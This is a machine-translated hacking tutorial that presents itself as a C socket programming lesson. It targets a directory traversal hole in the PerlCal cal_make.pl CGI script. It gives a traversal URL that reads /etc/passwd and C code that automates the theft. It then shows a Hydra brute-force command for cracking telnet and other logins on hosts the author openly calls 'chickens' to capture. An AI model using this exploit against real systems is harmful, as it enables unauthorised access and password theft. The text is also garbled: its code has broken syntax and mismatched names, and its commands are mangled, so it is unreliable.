LINUX C programming five cal_make.pl vulnerability scanner
One idea:
This is the use of Showflie class vulnerabilities to get the password documentation of the remote host, the usage is basically the same, can be said to be a sister! Vulnerability Description:
Vulnerability Name: Perlcal Directory Traversal Vulnerability Overview: There is a vulnerability, remote attacker can use "../" technology traversal other directory affected by other directories other than the web root directory: Acme Software PerlCal 2.95 ACME Software Perlcal 2.9e Acme Software Perlcal 2.9d Acme Software PerlCal 2.9c Acme Software PerlCal 2.9b Acme Software PerlCal 2.9a Acme Software PerlCal 2.9 Acme Software PerlCal 2.80 Acme Software PerlCal 2.7 Acme Software PerlCal 2.6 Acme Software PerlCal 2.5 Acme Software PerlCal 2.4 Acme Software PerlCal 2.3 Acme Software PerlCal 2.18 Acme Software Perlcal 2.13
description:
Perlcal is the CGI script developed by ACME Software, providing web-based calendar features. This script has a vulnerability, and the remote attacker can use the ".." technology to traverse other directories other than the web root directory, only by the Web service. Normally, the web service runs as a Nobody user. Vulnerability Test Method and Vulnerability Test Procedure: Submit the following URL request:
Http://www.example.com/cgi-bin/cal_make.pl? p0 = .. / .. / .. / .. / .. /. / .. / .. / .. / .. / . ../../etc/passwd
Will display / etc / passwd file content
II. Function Description: Another Socket programming knowledge, don't bother! ? 1. Type of socket socket_streamsocket_dgramsocket_rawsocket_seqpacketsocket_rdm
2. Slim address structure SockAddr_insockAddrin_ADDR
3. The implementation process of TCP socket:
Service-Terminal
Socket () | bind () | client listen () socket () | | accept () <- Coordinate connection ---- connection () | | rv () <--- Data Request -------- Send () <- ---- Data Response ----> Recv () - | | RECV () <---- end connection ------ Close () | Close ()
The following specifically introduces several important functions:
1. Socket (): 1.1 prototype: #include
TYPE: Communication Type SOCK_STREAM (byte Jacket Interface), SOCK_DGRAM (Data Supply Set) and SOCK_RAW (Original Set Interface) Protocol: The protocol used is 0, and the system is automatically selected. 1.3 Return value: successfully returned non-zero, failed to return -1.
2.Connect (): 2.1 Prototype: #include
3.send (): 3.1 prototype: #include
4.Recv (): 4.1 Prototy: #include
5.GethostByname (): 5.1 Prototype: String gethostByname (String hostname); 5.2 Description: This function returns an IP URL (IP Address) of a machine name (Domain Name). If the execution fails, return the original machine name.
6. SockAddr_in structure: 6.1 Structure: SockAddr_in defines in Netinet / in.h: struct sockaddr_in {short int sin_family; / * protocol * / unsigned short int sin_port; / * port number * / struct in_addr sin_addr; / * Network address * / unsigned char sin_zero [8]; / * Keep and SOCKADDR Structures * /}; 6.2 Description: Use the SockAddr_in structure to set / obtain address information. SIN_FAMILY refers to the protocol, which can only be AF_INITSIN_PORT storage port number (using network byte order) SIN_ADDR to store IP addresses, using IN_ADDR {UNSIGNED long s_addr;}; this data structure is due to historical reasons The reserved is mainly used as a previous format. S_addr Stores the IP Address SIN_ZERO in the network byte sequence to keep the SockAddr to maintain the same empty byte that remains the same as the SOCKADDR_IN. 6.3 Example: Struct SockAddr_in sa; sa.sin_family = AF_INET; sa.sin_port = HTONS (3490); / * short, nbo * / sa.sin_addr.s_addr = inet_addr ("132.241.5.10"); Bzero (& (SA. SIN_ZERO, 8); Note: If sa.sin_addr.s_addr = INADDR_ANY, the IP address 7.Hostent structure 7.1 structure: This data structure is defined as follows: struct hostent {char * h_name; / * The official name of the host * / Char ** h_aliases; / * Host alias * / int h_addrtype; / * Return the address type, generally AF_INET * / INT H_LENGTH; / * Address byte length * / char ** h_addr_list / * Host network address * /}
3. Programming:
Under Linux: Create file Nightcat @ nightcat $ vi calmake.c Editing the following: / * The calmake canner version 1.0 * * One Simple Method Generate Linux Chicken Is To Search CGI Script Way-Board.c * Gi and Use My Small Tools To Get the passwd.txt * * * to completion: * user $ gcc -o calmake calmake.c * * to use: * user $. / calmake somedomain.com Directory (ie ./calmake antion.com) * * Coded by nightcat * MARCH 2004 * * /
#include
INT Main (int Argc, char * argv []) {Int S; struct in_addr addr; struct sockaddr_in vic; struct hostent * brad; char buffer [1024]; file * fp; char cgihole [300]; if (argc! = 3) {EXIT (Printf ("/ Nusage:% s Domain.com Directory", Argv [0])); / *** Note 1 *** /} Sprintf (cgihole, "get% s http / 1.0 / n / N ", Argv [2]); Printf ("% s ", cgihole); if ((BAD = gethostByname) == null) {EXIT (" "" "" "Error Getting Hostname / N") }
Printf ("Check the Hole / N"); Printf ("Coded by Nighcat / N");
System ("Sleep 2");
S = socket (AF_INET, SOCK_STREAM, 0); if (s <0) exit (Printf ("Socket Error / N");
Bcopy (Bad-> h_addr, (char *) & victem.sin_addr, bad-> h_length; victem.sin_family = AF_INET; VICTEM.SIN_PORT = HTONS (80); IF (Connect (S, (S, Struct SockAddr *) & VicTem, Sizeof (VICTEM) <0) {EXIT (Printf ("Connect Error / N"));} Printf ("/ Ngetting Host's Passwd.txt / N / N"); if ((fp = fopen ("getPasswd.txt" , "W")) == null) {EXIT (Printf ("Cann't open file"));} Send (s, cgihole, sizeof (cgihole), 0); while (RECV (S, Buffer, Sizeof) Buffer, 0)> 0) {/ *** Note Two *** / FPRINTF (FP, "% S", Buffer;} fclose (fp); close (s);}
Save Exit: WQ Compilation Perform: $ GCC -O Calmake Calmake.c $. / CALMAKE TARGETIP /CAL_MAKE.PL ?/ =../../../....../../../ .. /../../....../tc/passwd gets and manually utilized two, the same user document.
You can get the normal user of the host with a method of cracking. I like to use Hydra to crack $. / Hydra -f /root/passwd.txt targetip telnet Detailed look at his description! You can also crack other services. FTP / VNC / SMTP, etc.!
IV. Note One: Here is the format of the input. In fact, this program can use other ShowFile vulnerabilities. Note 2: Here you need to use the While judgment to accept all return data, I have been a long time here. I understand it! This means that if the data is more than zero, continue to write to the file until the data is written.
Five contact me:
Nickname: NIGHTCATE-mail: ncnynl@hotmail.comqq: 1043931icq: 153436005